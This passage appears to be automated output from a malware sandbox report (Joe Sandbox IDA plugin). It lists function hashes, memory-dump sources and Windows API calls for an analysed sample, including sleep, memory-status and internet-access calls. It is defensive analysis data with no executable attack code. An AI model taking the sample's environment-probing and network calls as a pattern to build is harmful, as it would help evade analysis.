                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                    • String ID: pow
                                                                                                                                                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                    • Opcode ID: 716185ef836ba3bd3e0dbc1dd402446f5ac5c452832da2d60476d2997bb77b04
                                                                                                                                                                                                                                                                                    • Instruction ID: 08b6bdca0a142241fb8f2e5125e8f65c7459178642e3cbc1003fd7e04a96ebb1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 716185ef836ba3bd3e0dbc1dd402446f5ac5c452832da2d60476d2997bb77b04
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49514862A08102AAC7167714D9413EA2FE4FB55B40F608DD8F0A1522E8DF36CCE5DB86
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: #
                                                                                                                                                                                                                                                                                    • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                    • Opcode ID: 2d790d9ea45bc2ce699edf19e242760af709ed66cbbd68bcacd21486c4578399
                                                                                                                                                                                                                                                                                    • Instruction ID: a257b4df2f2ef05f6d52b1b53697beaf6bd7be57ec3b6113d556e6e546466bad
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d790d9ea45bc2ce699edf19e242760af709ed66cbbd68bcacd21486c4578399
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF51337560434A9FCB25DF68C481AFA7BB0EF25310F2480A5F9959B3D0DB749D82CB62
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00AFF6DB
                                                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00AFF6F4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                    • Opcode ID: 0da6e0f2a0521da476d1f902c27edaaa2fae8ed225363fe75628594df5182761
                                                                                                                                                                                                                                                                                    • Instruction ID: 1a2f17dc2b03f30913c8748e2376b177bdc22b62b5c2bb59fa48ee3ffe701ed3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0da6e0f2a0521da476d1f902c27edaaa2fae8ed225363fe75628594df5182761
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 705139718087889BD320EF11DD86BABB7E8FF84340F81485EF1D9521A5DF308529CB66
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                    • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                    • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                    • Opcode ID: 13321f9d8ca7d5b73df7f11afd45b44406305e49eeca832446df05fab29707d2
                                                                                                                                                                                                                                                                                    • Instruction ID: 22a303927056a24cd1184e747fda8fe475b58db2c3a5d9e69870f83343eaa1df
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13321f9d8ca7d5b73df7f11afd45b44406305e49eeca832446df05fab29707d2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7441DC71E002099FCB04EFA9C8A59FEBBF5FF58364F1040A9E506A7251EB759D81CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B5DB75
                                                                                                                                                                                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B5DB7F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                                                                                                                    • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                    • Opcode ID: e278f35e3a4b566763a1aac930ceae0fe8cd748fe944f7391b36bde12a084e7d
                                                                                                                                                                                                                                                                                    • Instruction ID: 5acc9dee80068ed4e9e3a538536ff9c3cb5314e5aa9d033e6f733f69c80dec6f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e278f35e3a4b566763a1aac930ceae0fe8cd748fe944f7391b36bde12a084e7d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4316F71C01109ABCF15EFA5CD85AEE7FB9FF04344F1000A5FC15A6162EB759A56CB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00B740BD
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B740F8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                    • Opcode ID: d816919c59533e1f95ca21d52825cb9f375cb6831608bf45b502b77abd651b77
                                                                                                                                                                                                                                                                                    • Instruction ID: 24c495ebb85ab2bc47c86c7cd01240f0daa196337c225d3c311edcbbfc07018b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d816919c59533e1f95ca21d52825cb9f375cb6831608bf45b502b77abd651b77
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D317E71110604AADB24DF78CC80EFB77E9FF48764F008619FAA997190DB71AC81DBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00B750BD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B750D2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: '
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                    • Opcode ID: 049fd2ea2fe1710490007abaa3c6c6c9a47009ec93435902cf9cba95f4ce53a3
                                                                                                                                                                                                                                                                                    • Instruction ID: 36a0016ecdb3ed0966f7427807dc16f873a27fc91b1034391bacf56c15b2154e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 049fd2ea2fe1710490007abaa3c6c6c9a47009ec93435902cf9cba95f4ce53a3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8631F874A0170A9FDB24CF69C981BDA7BF5FF49300F1081AAE918AB351D7B1A945CF90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B73D18
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B73D23
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: Combobox
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                                                    • Opcode ID: 98e2639211c285d251df97c44242cf0ae8e26ce2040bfa5af17bab0c659185d1
                                                                                                                                                                                                                                                                                    • Instruction ID: d7d086fa3df4feb7c4ce605191c6c64bac2ce0f2a93c99f87c028255e70d9f8c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98e2639211c285d251df97c44242cf0ae8e26ce2040bfa5af17bab0c659185d1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6011B671700208AFEF219F64DC81FAB3BEAEB947A4F108164F52997290D7719D51A7A0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AE78B1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE7873: GetStockObject.GDI32(00000011), ref: 00AE78C5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE78CF
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B74216
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00B74230
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                    • Opcode ID: 350de5eaea5e4ea52db73b7ef020a47417f52dfcb1ab3d1dbd0d1cf447fa8d93
                                                                                                                                                                                                                                                                                    • Instruction ID: f9969ccf7e5c71aac9a9e11f66591eae0467c019391001f97fa6b13455c1715f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 350de5eaea5e4ea52db73b7ef020a47417f52dfcb1ab3d1dbd0d1cf447fa8d93
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0115972610209AFDB00DFA8CC45AEA7BF8EF08354F014914F969E3251D735E8609B50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B5D7C2
                                                                                                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B5D7EB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                    • String ID: <local>
                                                                                                                                                                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                    • Opcode ID: 484d76f9a47b7d0eb6947b0b1cc712bd2a079f1c6f00f12e52e305c0f6cad485
                                                                                                                                                                                                                                                                                    • Instruction ID: 54676daf256e5653e955e8e79db9eb21f4a9ea18d8efed0a08647411ceb8e17f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 484d76f9a47b7d0eb6947b0b1cc712bd2a079f1c6f00f12e52e305c0f6cad485
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E11297120623279D7384B628C85FF7BEDCEF167A6F004396F90983080D6608C48C6F0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 00B4761D
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B47629
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                    • String ID: STOP
                                                                                                                                                                                                                                                                                    • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                    • Opcode ID: b9a381f3b2c56471d45009351c94c69be76b69cece9fa08b87d3aeb5dae30908
                                                                                                                                                                                                                                                                                    • Instruction ID: 3c2bd9dc6f16f868aa29d58eb61cf3bd3d0a6a919293461bc3e36522cb6c1e1f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9a381f3b2c56471d45009351c94c69be76b69cece9fa08b87d3aeb5dae30908
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB010032A589278FCB20AEBDDC808BF33F6EF6035070209A4E42193294EF31DA14E250
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B42699
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                    • Opcode ID: cb02aabc6f93c2399b8608966434e7601eb9aff4ae67654b2b0d259f6d7495a3
                                                                                                                                                                                                                                                                                    • Instruction ID: f08edef83894f5015a333924037f5804f33b50d660e504dc9411c226016f6ca0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb02aabc6f93c2399b8608966434e7601eb9aff4ae67654b2b0d259f6d7495a3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7012875610114ABCB04EB64CC86DFE73F4EF46350B800659F832972D1DB715908E660
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B42593
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                    • Opcode ID: 6b9078eb91894c8c9a584f006e8761288615f402afc75f1a9f8e45d43ea1b316
                                                                                                                                                                                                                                                                                    • Instruction ID: ae3574e18882a0c1004f9f43fcbb2e859368dc3f28888a92c2eccd7585278c46
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b9078eb91894c8c9a584f006e8761288615f402afc75f1a9f8e45d43ea1b316
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A201F775A401056BCF05E790C967EFF73E8DF65340F94005AB812A7281DB509F08A6B1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B42615
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
